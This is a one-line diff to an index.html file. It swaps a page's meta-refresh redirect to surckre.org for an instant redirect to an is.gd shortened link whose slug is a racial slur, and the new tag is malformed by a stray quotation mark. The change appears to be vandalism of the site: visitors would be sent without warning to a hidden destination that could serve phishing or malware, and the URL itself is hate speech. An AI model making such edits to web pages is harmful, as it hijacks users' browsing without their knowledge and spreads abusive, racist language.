--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<meta http-equiv="refresh" content="0; url=https://surckre.org">
+<meta http-equiv="refresh" content="0; url="https://is.gd/fuckyounigger">
